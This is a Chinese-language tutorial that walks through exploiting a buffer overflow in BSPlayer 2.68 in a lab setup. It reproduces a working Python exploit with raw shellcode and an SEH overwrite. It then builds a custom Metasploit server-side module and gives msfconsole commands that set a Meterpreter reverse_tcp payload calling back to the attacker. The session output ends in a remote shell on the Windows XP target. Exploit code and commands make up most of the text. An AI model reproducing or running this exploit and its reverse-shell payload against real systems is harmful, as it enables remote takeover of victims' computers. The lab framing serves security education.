渗透之——Metasploit渗透BSPlayer V2.68（metasploit扫描漏洞并攻击）

渗透之——Metasploit渗透BSPlayer V2.68（metasploit扫描漏洞并攻击）

攻击机 Kali 192.168.109.137

靶机 WinXP 192.168.109.141

应用程序 BSPlayer V2.68 (可以到链接下载BSPlayer V2.68 + 渗透脚本 )

1.运行渗透脚本36477.py

在靶机的命令行下切换到脚本36477.py所在的目录并输入如下命令：

python 36477.py 127.0.0.1 81

2.安装并打开Bsplayer

安装略。

此时，在Bsplayer中依次单击menu->打开 URL(U)... 载入要加载的链接，这里载入的链接为脚本36477.py监听的地址和端口,即：V2.68 存在溢出漏洞。

3.分析36477.py脚本

脚本具体内容如下：

#!/usr/bin/python''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the fulladdress and then used backward jumping to jump to a long jump that eventually land in my shellcode.Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)My twitter: @fady_osmanMy youtube: socketimport syss = socket.socket() # Create a socket objectif(len(sys.argv) < 3): print "[x] Please enter an IP and port to listen to." print "[x] " + sys.argv[0] + " ip port" exit()host = sys.argv[1] # Ip to listen to.port = int(sys.argv[2]) # Reserve a port for your service.s.bind((host, port)) # Bind to the portprint "[*] Listening on port " + str(port)s.listen(5) # Now wait for client connection.c, addr = s.accept() # Establish connection with client.# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.print(('[*] Sending the payload first time', addr))c.recv(1024)#seh and nseh.buf = ""buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31"buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a"buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94"buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01"buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5"buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7"buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f"buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7"buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34"buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80"buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3"buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5"buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5"buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c"buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15"buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c"buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22"buf += "\x8c\xcd\x11\xc2\x37\x12"jmplong = "\xe9\x85\xe9\xff\xff"nseh = "\xeb\xf9\x90\x90"# Partially overwriting the seh record (nulls are ignored).seh = "\x3b\x58\x00\x00"buflen = len(buf)response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000c.send(response)c.close()c, addr = s.accept() # Establish connection with client.# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.print(('[*] Sending the payload second time', addr))c.recv(1024)c.send(response)c.close()s.close()

由此脚本我们可以得出几个重要的信息：

由此，我们就可以编写渗透模块了。

注意：在当前场景中，需要目标计算机主动来连接我们的渗透服务器，而不是我们去连接目标服务器。因此我们的渗透服务器必须时刻对即将到来的连接处于监听状态。当收到目标请求之后，要向其发送恶意的内容。

4.创建Metasploit渗透脚本bsplayer_attack_by_binghe.rb

### Author 冰河# Date 2019-01-17# Description Metasploit渗透 Bsplayer V2.68## 在当前场景中，需要目标计算机主动来连接我们的渗透服务器，而不是我们去连接目标服务器。# 因此我们的渗透服务器必须时刻对即将到来的连接处于监听状态。当收到目标请求之后，要向# 其发送恶意的内容。##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer def initialize(info = {}) super(update_info(info, 'Name' => "BsPlayer 2.68 SEH Overflow Exploit", 'Description' => %q{ Here's an example of server Based Exploit }, 'Author' => ['binghe'], 'Platform' => 'Windows', 'Targets' => [ ['Generic', {'Ret' => 0x0000583b, 'Offset' => 2048}], ], 'Payload' => { 'BadChars' => "\x00\x0a\x20\x0d" }, 'DisclosureDate' => "2017-01-17", 'DefaultTarget' => 0)) end def on_client_connect(client) return if((p = regenerate_payload(client)) == nil) print_status("Client Connected") sploit = make_nops(target['Offset']) sploit << payload.encoded sploit << "\xcc" * (6787 - 2048 - payload.encoded.length) sploit << "\xe9\x85\xe9\xff\xff" sploit << "\xeb\xf9\x90\x90" sploit << [target.ret].pack('V') client.put(sploit) client.get_once client.put(sploit) handler(client) service.close_client(client) endend

5.上传渗透脚本bsplayer_attack_by_binghe.rb

将渗透脚本bsplayer_attack_by_binghe.rb上传到Kali的/usr/share/metasploit-framework/modules/exploits/windows/masteringmetasploit目录下

6.运行渗透脚本bsplayer_attack_by_binghe.rb

msfconsoleuse exploit/windows/masteringmetasploit/bsplayer_attack_by_binghe set SRVHOST 192.168.109.137set SRVPORT 8080set payload windows/meterpreter/reverse_tcpset LHOST 192.168.109.137set LPORT 8888show optionsexploit

具体操作效果如下：

msf > use exploit/windows/masteringmetasploit/bsplayer_attack_by_binghe msf exploit(windows/masteringmetasploit/bsplayer_attack_by_binghe) > set SRVHOST 192.168.109.137SRVHOST => 192.168.109.137msf exploit(windows/masteringmetasploit/bsplayer_attack_by_binghe) > set SRVPORT 8080SRVPORT => 8080msf exploit(windows/masteringmetasploit/bsplayer_attack_by_binghe) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(windows/masteringmetasploit/bsplayer_attack_by_binghe) > set LHOST 192.168.109.137LHOST => 192.168.109.137msf exploit(windows/masteringmetasploit/bsplayer_attack_by_binghe) > set LPORT 8888LPORT => 8888msf exploit(windows/masteringmetasploit/bsplayer_attack_by_binghe) > show optionsModule options (exploit/windows/masteringmetasploit/bsplayer_attack_by_binghe): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 192.168.109.137 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated)Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.109.137 yes The listen address (an interface may be specified) LPORT 8888 yes The listen portExploit target: Id Name -- ---- 0 Genericmsf exploit(windows/masteringmetasploit/bsplayer_attack_by_binghe) > exploit[*] Exploit running as background job 0.[*] Started reverse TCP handler on 192.168.109.137:8888 msf exploit(windows/masteringmetasploit/bsplayer_attack_by_binghe) > [*] Started service listener on 192.168.109.137:8080 [*] Server started.

7.打开Bsplay并设置打开的URL

8.查看Kali终端结果

此时，我们切换到Kali下查看结果，输出如下：

[*] Client Connected[*] Client Connected[*] Sending stage (179779 bytes) to 192.168.109.141meterpreter > ifconfigInterface 1============Name : MS TCP Loopback interfaceHardware MAC : 00:00:00:00:00:00MTU : 1520IPv4 Address : 127.0.0.1Interface 65539============Name : VMware Accelerated AMD PCNet AdapterHardware MAC : 00:0c:29:5d:8e:d4MTU : 1500IPv4 Address : 192.168.109.141IPv4 Netmask : 255.255.255.0Interface 65540============Name : Bluetooth �sHardware MAC : 3c:a0:67:1a:fe:b4MTU : 1500meterpreter >

此时，我们通过BSPlayer的漏洞拿下了目标主机的Materpreter Shell。

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。